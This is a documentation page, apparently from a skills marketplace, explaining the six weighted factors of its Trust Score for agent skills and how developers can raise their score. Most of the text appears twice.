Trust Score: How It Works and How to Improve It

What Is the Trust Score?

When users browse Skills IL looking for a skill to install, they want to know it's safe and reliable. The Trust Score is a number between 0 and 100 that gives them exactly that: a quick picture of how well-maintained, secure, and documented a skill is.

The score is calculated automatically by our system. There is no way to run the check yourself. Once you push changes to your repo, the score updates on the next sync.

Why Does It Matter?

Users trust skills with higher scores more
Skills with low scores get fewer installs
Very low scores (below 50) display an "Under Review" badge that discourages installation

Trust Tiers

The trust score maps to one of four tiers:

Tier	Score Range	What It Means
Verified	90-100	The skill has passed deep reviews, is actively maintained, and comes from a known publisher. Most skills don't reach this tier
Trusted	70-89	A reliable skill with good maintenance and full documentation. This is the tier to aim for
Community	50-69	A working skill with room for improvement in security, documentation, or maintenance
Under Review	0-49	Low score. Check the factors below and address them

Six Factors That Make Up the Score

The score is a weighted average of six dimensions. Each has a different weight:

1. Code Quality - 25%

The largest weight. The system checks the ratio of open issues to stars in your repo, and the number of contributors.

What raises it:

Low ratio of open issues to stars
Multiple contributors (a repo maintained by several people is considered more reliable)
Positive results from the Tank security scanner

What lowers it:

Many open issues relative to stars
Only one contributor (solo repos score lower)
A repo with zero stars gets a low baseline

2. Permissions - 20%

When a skill requests access to powerful tools, the score drops. The system scans the allowed-tools list in SKILL.md and scores based on risk level.

What raises it:

Using only safe tools (Read, Grep, Glob)
Limiting tools to a small, well-defined list

What lowers it:

Bash - drops 30 points. The riskiest tool because it can execute any command
ComputerTool - drops 25 points. Full desktop control
Write / Edit - each drops 10 points. File creation and modification
WebFetch / WebSearch - each drops 10 points. Internet access
Restricted tools receive 50% of the penalty
Using a wildcard (all tools) drops to zero

Tip: If your skill uses Bash only to run a Python script, consider switching to Read + direct file writes. Every tool you don't actually need should be removed from the list.

3. Data Handling - 20%

The system scans your code for patterns that indicate access to sensitive data.

What raises it:

A skill that doesn't access environment variables, files, or the network
Clear documentation of what data the skill needs and why

What lowers it:

Accessing environment variables (e.g., reading API keys from .env)
File system read/write operations
Network requests (HTTP calls) to external services
Executing external scripts
Processing personal data (ID numbers, vehicle plates, payment details)

Example: A skill that files reports to the Israeli Tax Authority needs to read an API key from an environment variable and send data to an external server. That's completely legitimate, but the system can't distinguish this from a skill exfiltrating sensitive data, so the score drops. Document this in your SKILL.md so users understand why.

4. Publisher Reputation - 15%

Based on your GitHub presence. New repos (less than 30 days old) start with a higher baseline (50) to avoid penalizing new developers.

What raises it:

Stars - each star is worth 2 points (up to 35 points)
Forks - each fork is worth 5 points (up to 25 points)
Contributors - each contributor is worth 10 points (up to 25 points)

What lowers it:

An established repo (over 30 days) with no stars, forks, or contributors
Established repos start at a baseline of only 15 points (versus 50 for new repos)

Tip: The most effective way to improve this metric is to encourage the community to star your repo. Even a single additional contributor (someone who fixes a bug or adds a translation) makes a big difference.

5. Maintenance - 10%

How long since the last commit. A skill that hasn't been updated in a long time scores low.

Time Since Last Commit	Score
Less than 7 days	100
Less than 30 days	85
Less than 90 days	70
Less than 180 days	50
Less than a year	30
Over a year	15

What raises it:

A fresh commit. Even a small documentation change is enough

What lowers it:

Extended inactivity. After 90 days without a commit, the score starts dropping significantly

6. Documentation - 10%

Checks whether basic documentation files exist.

What raises it:

A valid SKILL.md file (+60 points)
A LICENSE file (+40 points)
Both files together = 100

What lowers it:

Missing SKILL.md = 0 points (this file is required anyway)
Missing LICENSE = you lose 40 points

Tip: Add a LICENSE file if you don't have one yet. MIT is a good choice for most skills.

Frequently Asked Questions

Can I run the check myself before publishing a new version? No. The score is calculated automatically on our servers during the sync process. There is no external tool you can download and run. The reason: some checks require access to the GitHub API and security scanners that run on our side.

How long until the score updates? Skills IL org skills sync daily. External skills (not part of the org) resync weekly (Sundays). If it's urgent, contact us and we'll run a manual sync.

My score is low because my skill needs Bash. What do I do? Using Bash drops 30 points from the Permissions score. If you genuinely need Bash (e.g., for running scripts), that's fine, the score reflects reality. If you can switch to Read + Write, that will improve the score.

My skill accesses personal data legitimately. How does the score handle that? The system doesn't distinguish between legitimate and illegitimate use. It only detects patterns (network access, processing personal identifiers, environment variables). Document the usage in your SKILL.md so users understand.

My new repo got a low score. Why? New repos start with a higher baseline for Publisher Reputation (50 instead of 15), but if there are no stars or forks the score is still low. Additionally, Permissions and Data Handling scores depend on the skill's actual content.

Quick Improvement Checklist

Push a fresh commit (raises Maintenance)
Make sure you have a LICENSE file (raises Documentation by 40 points)
Remove unnecessary tools from the allowed-tools list (raises Permissions)
Minimize environment variable access to what's essential (raises Data Handling)
Encourage stars on your repo (raises Publisher Reputation)
Invite an additional contributor, even for a translation or small fix (raises Code Quality + Publisher Reputation)

Trust Score: How It Works and How to Improve It

What Is the Trust Score?

The score is calculated automatically by our system. There is no way to run the check yourself. Once you push changes to your repo, the score updates on the next sync.

Why Does It Matter?

Users trust skills with higher scores more
Skills with low scores get fewer installs
Very low scores (below 50) display an "Under Review" badge that discourages installation

Trust Tiers

The trust score maps to one of four tiers:

Tier	Score Range	What It Means
Verified	90-100	The skill has passed deep reviews, is actively maintained, and comes from a known publisher. Most skills don't reach this tier
Trusted	70-89	A reliable skill with good maintenance and full documentation. This is the tier to aim for
Community	50-69	A working skill with room for improvement in security, documentation, or maintenance
Under Review	0-49	Low score. Check the factors below and address them

Six Factors That Make Up the Score

The score is a weighted average of six dimensions. Each has a different weight:

1. Code Quality - 25%

The largest weight. The system checks the ratio of open issues to stars in your repo, and the number of contributors.

What raises it:

Low ratio of open issues to stars
Multiple contributors (a repo maintained by several people is considered more reliable)
Positive results from the Tank security scanner

What lowers it:

Many open issues relative to stars
Only one contributor (solo repos score lower)
A repo with zero stars gets a low baseline

2. Permissions - 20%

When a skill requests access to powerful tools, the score drops. The system scans the allowed-tools list in SKILL.md and scores based on risk level.

What raises it:

Using only safe tools (Read, Grep, Glob)
Limiting tools to a small, well-defined list

What lowers it:

Bash - drops 30 points. The riskiest tool because it can execute any command
ComputerTool - drops 25 points. Full desktop control
Write / Edit - each drops 10 points. File creation and modification
WebFetch / WebSearch - each drops 10 points. Internet access
Restricted tools receive 50% of the penalty
Using a wildcard (all tools) drops to zero

Tip: If your skill uses Bash only to run a Python script, consider switching to Read + direct file writes. Every tool you don't actually need should be removed from the list.

3. Data Handling - 20%

The system scans your code for patterns that indicate access to sensitive data.

What raises it:

A skill that doesn't access environment variables, files, or the network
Clear documentation of what data the skill needs and why

What lowers it:

Accessing environment variables (e.g., reading API keys from .env)
File system read/write operations
Network requests (HTTP calls) to external services
Executing external scripts
Processing personal data (ID numbers, vehicle plates, payment details)

Example: A skill that files reports to the Israeli Tax Authority needs to read an API key from an environment variable and send data to an external server. That's completely legitimate, but the system can't distinguish this from a skill exfiltrating sensitive data, so the score drops. Document this in your SKILL.md so users understand why.

4. Publisher Reputation - 15%

Based on your GitHub presence. New repos (less than 30 days old) start with a higher baseline (50) to avoid penalizing new developers.

What raises it:

Stars - each star is worth 2 points (up to 35 points)
Forks - each fork is worth 5 points (up to 25 points)
Contributors - each contributor is worth 10 points (up to 25 points)

What lowers it:

An established repo (over 30 days) with no stars, forks, or contributors
Established repos start at a baseline of only 15 points (versus 50 for new repos)

Tip: The most effective way to improve this metric is to encourage the community to star your repo. Even a single additional contributor (someone who fixes a bug or adds a translation) makes a big difference.

5. Maintenance - 10%

How long since the last commit. A skill that hasn't been updated in a long time scores low.

Time Since Last Commit	Score
Less than 7 days	100
Less than 30 days	85
Less than 90 days	70
Less than 180 days	50
Less than a year	30
Over a year	15

What raises it:

A fresh commit. Even a small documentation change is enough

What lowers it:

Extended inactivity. After 90 days without a commit, the score starts dropping significantly

6. Documentation - 10%

Checks whether basic documentation files exist.

What raises it:

A valid SKILL.md file (+60 points)
A LICENSE file (+40 points)
Both files together = 100

What lowers it:

Missing SKILL.md = 0 points (this file is required anyway)
Missing LICENSE = you lose 40 points

Tip: Add a LICENSE file if you don't have one yet. MIT is a good choice for most skills.

Frequently Asked Questions

How long until the score updates? Skills IL org skills sync daily. External skills (not part of the org) resync weekly (Sundays). If it's urgent, contact us and we'll run a manual sync.

Quick Improvement Checklist

Push a fresh commit (raises Maintenance)
Make sure you have a LICENSE file (raises Documentation by 40 points)
Remove unnecessary tools from the allowed-tools list (raises Permissions)
Minimize environment variable access to what's essential (raises Data Handling)
Encourage stars on your repo (raises Publisher Reputation)
Invite an additional contributor, even for a translation or small fix (raises Code Quality + Publisher Reputation)